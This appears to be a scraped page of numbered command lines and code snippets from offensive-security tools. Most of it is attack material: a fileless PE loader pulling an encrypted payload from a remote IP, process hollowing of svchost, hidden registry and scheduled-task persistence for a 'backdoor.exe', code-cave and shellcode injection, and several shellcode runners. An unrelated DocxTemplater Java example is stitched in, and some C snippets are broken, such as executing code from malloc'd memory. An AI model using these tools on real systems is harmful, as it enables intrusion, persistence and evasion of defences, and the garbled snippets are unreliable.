1
FilelessPELoader.exe 192.168.126.240 8080 cipher. bin key. bin

1
DotNetLoader.exe TestDLL_x64.dll

1
hollow svchost.exe calc.bin

1
SharpHide.exe action=create keyvalue="C:\Windows\Temp\Bla.exe"

1
SyscallHide.exe create C:\Windows\Temp\backdoor.exe argument1

1
ScheduleRunner.exe /method:create /taskname:Cleanup /trigger:daily /starttime:23:30 /program:calc.exe /description:"Some description" /author:netero1010 /technique:hide

1
2
3
4
Import-Module .\Invoke-ScheduledJob\Invoke-ExpressionAs.psm1

$Credential = Get-Credential
Invoke-ExpressionAs -Command "& cmd /c notepad.exe" -Credential $Credential

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// Setting up parameters for template processing
HashMap<String, Object>	params = new HashMap<String, Object>();
params.put("name", "John");
params.put("sirname", "Smith");

// Define template source
// Option 1. Template is read from file system
DocxTemplater docxTemplater = new DocxTemplater(new File("path_to_docx_template/template.docx"));
// Option 2. Template is read from a stream
DocxTemplater docxTemplater = new DocxTemplater(new FileInputStream(new File("path_to_docx_template/template1.docx")), "template1");

// Actual processing
// Option 1. Processing with file as result
docxTemplater.process(new File("path_to_result_docx/result.docx"), params);
// Option 2. Processing with writing result to OutputStream
docxTemplater.process(new FileOutputStream(new File("path_to_result_docx/result.docx")), params);
// Option 3. Processing with InputStream as result
InputStream docInputStream = docxTemplater.processAndReturnInputStream(params);

1
EXCELntDonut -f exe_source.cs -r System.Windows.Forms.dll --sandbox --obfuscate

1
search ~/Downloads/putty.exe

1
CaveCarver.exe path_to_exe path_to_shellcode

1
2
$keys = Get-CLSIDRegistryKeys -RegHive HKCR 
$results = $keys | % {$guid = Extract-GUIDFromText $_; Map-GUIDToDLL -guid $guid 2> $null }

1
Invoke-WordThief

1
processrefund.exe svchost.exe MalExe.exe

1
python unicorn.py <path_to_shellcode.txt>: shellcode hta

1
VirtualAllocEx->WriteProcessMemory->MmMapIoSpace

1
COFFLoader2.exe /load example.coff

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import ctypes

# Allocate memory space
executable_code = ctypes.create_string_buffer(b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc3')

# Convert the memory space to a function pointer
function_pointer = ctypes.cast(executable_code, ctypes.CFUNCTYPE(None))

# Call the executable code using the function pointer
function_pointer()

# Free the allocated memory space
ctypes.windll.kernel32.VirtualFree(ctypes.addressof(executable_code), 0, ctypes.c_uint(0x8000))

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#include <stdio.h>
#include <stdlib.h>

// The function to execute in memory
int add(int a, int b)
{
    return a + b;
}

int main()
{
    // Allocate memory with the executable flag set
    void* mem = malloc(1024);
    int (*func_ptr)(int, int) = (int (*)(int, int))mem; // cast the pointer to a function pointer

    // Copy the machine code of the add function to the allocated memory block
    char code[] = {0x55,             // push ebp
                   0x89, 0xE5,       // mov ebp, esp
                   0x8B, 0x45, 0x08, // mov eax, [ebp+8]
                   0x03, 0x45, 0x0C, // add eax, [ebp+12]
                   0x5D,             // pop ebp
                   0xC3};            // ret
    memcpy(mem, code, sizeof(code));

    // Call the function using the function pointer
    int result = func_ptr(2, 3);
    printf("Result: %d\n", result);

    free(mem); // free the allocated memory
    return 0;
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef void (*func_ptr)();

int main(int argc, char *argv[]) {
  FILE *fp;
  long size;
  char *buffer;
  func_ptr func;

  // Open the executable file for reading
  fp = fopen(argv[1], "rb");

  // Get the size of the .TEXT segment
  fseek(fp, 0L, SEEK_END);
  size = ftell(fp) - 0x1000;
  rewind(fp);

  // Allocate a block of memory to hold the .TEXT segment
  buffer = (char *)malloc(size);

  // Copy the contents of the .TEXT segment into the allocated memory block
  fseek(fp, 0x1000, SEEK_SET);
  fread(buffer, size, 1, fp);

  // Close the file
  fclose(fp);

  // Cast the starting address of the allocated block of memory to a function pointer
  func = (func_ptr)buffer;

  // Call the function using the function pointer
  (*func)();

  // Free the allocated memory block
  free(buffer);

  return 0;
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <Windows.h>
#include <stdio.h>
#include <stdint.h>
#include <assert.h>

#define RWXHUNTER_IMPL
#include "rwxhunter.h"

int main(int argc, char** argv) {
    uint8_t shellcode[] = "YOUR SHELLCODE HERE";

    // Initialize RWX-Hunter
    int rwxh_result = rwxh_init();
    assert(rwxh_result == RWXH_OK);

    // Find executable memory page
    void* exec_mem = rwxh_alloc_exec(sizeof(shellcode));
    assert(exec_mem != NULL);

    // Copy shellcode to executable memory page
    memcpy(exec_mem, shellcode, sizeof(shellcode));

    // Set memory page as executable
    rwxh_set_exec(exec_mem, sizeof(shellcode));

    // Cast executable memory to function pointer and execute shellcode
    int (*shellcode_func)() = (int(*)())exec_mem;
    shellcode_func();

    // Free executable memory page
    rwxh_free_exec(exec_mem);

    return 0;
}